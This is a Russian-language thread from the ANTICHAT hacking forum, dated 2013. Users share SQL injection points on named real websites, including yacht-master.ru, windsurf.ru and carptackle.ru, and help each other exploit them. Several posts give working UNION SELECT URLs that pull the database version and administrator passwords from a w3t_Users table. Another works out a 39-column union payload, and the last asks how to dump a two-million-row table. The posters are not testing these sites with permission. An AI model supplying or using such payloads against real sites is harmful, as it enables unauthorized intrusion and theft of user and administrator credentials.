ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.07.2013, 22:21
|
|
Новичок
Регистрация: 20.12.2007
Сообщений: 19
Провел на форуме:
373780
Репутация:
52
|
|
Что-то интересное:
senpolia.info/news/79'/
|
|
|
22.07.2013, 23:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
По той ссылке нет ничего.
Но кое что забавное есть в другом месте:
http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/
http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/sad
вылетают sql ошибки. Притом если поставить в запрос один из символов '(),=+ ошибки уже нет
|
|
|
|
23.07.2013, 00:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от [AVT
"]
[AVT] said:
Что-то интересное:
senpolia.info/news/79'/
Как вариант.
|
|
|
|
23.07.2013, 17:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
http://www.yacht-master.ru/board/viewphoto.php?p=203
http://www.windsurf.ru/board/viewphoto.php?&p=4885
В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?
|
|
|
|
23.07.2013, 17:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от rogatiy
rogatiy said:
http://www.yacht-master.ru/board/viewphoto.php?p=203
http://www.windsurf.ru/board/viewphoto.php?&p=4885
В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?
Вполне крутабельны.
1-ый линк:
Код:
Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,@@version,3,4,5,6,7,8+--+
2-ой линк:
Код:
Code:
http://www.windsurf.ru/board/viewphoto.php?&p=-99999'+union+select+1,@@version,3,4,5,6,7,8+--+
|
|
|
|
23.07.2013, 19:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
Благодарю! Сработало.
Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.
Код:
Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w3t_Users+--+
Как отфильтровать U_Username по U_Status='Administrator'?
Ответ:
Код:
Code:
http://yacht-master.ru/board/viewphoto.php?&p=-99999'+union+select+1,U_Password,3,4,5,6,7,8+from+w3t_Users+where+U_Status='Administrator'+--+
|
|
|
|
23.07.2013, 19:35
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Сообщение от rogatiy
rogatiy said:
Благодарю! Сработало.
Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.
Код:
Code:
http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w3t_Users+--+
Как отфильтровать U_Username по U_Status='Administrator'? используй where
|
|
|
|
24.07.2013, 23:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
11733
Репутация:
0
|
|
http://carptackle.ru/plugins/shop/features.php?product=1573
MySQL >5, есть information_schema
Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок
|
|
|
|
25.07.2013, 00:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от rogatiy
rogatiy said:
http://carptackle.ru/plugins/shop/features.php?product=1573
MySQL >5, есть information_schema
Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок
39 же
Код:
Code:
http://carptackle.ru/plugins/shop/features.php?product=1573+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--
смотри тайтл
|
|
|
|
26.07.2013, 07:07
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391
Репутация:
209
|
|
Есть скуля, на сайте таблица размеров в 2 млн записей
Сообщение от None
SELECT COUNT(field) FROM table WHERE LENGTH(field)>4
Показывает 2млн записей
Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [AVT]](/avatars/avatar46792.jpg?3548460){kind=avatar}
Похожие темы
Линейный вид
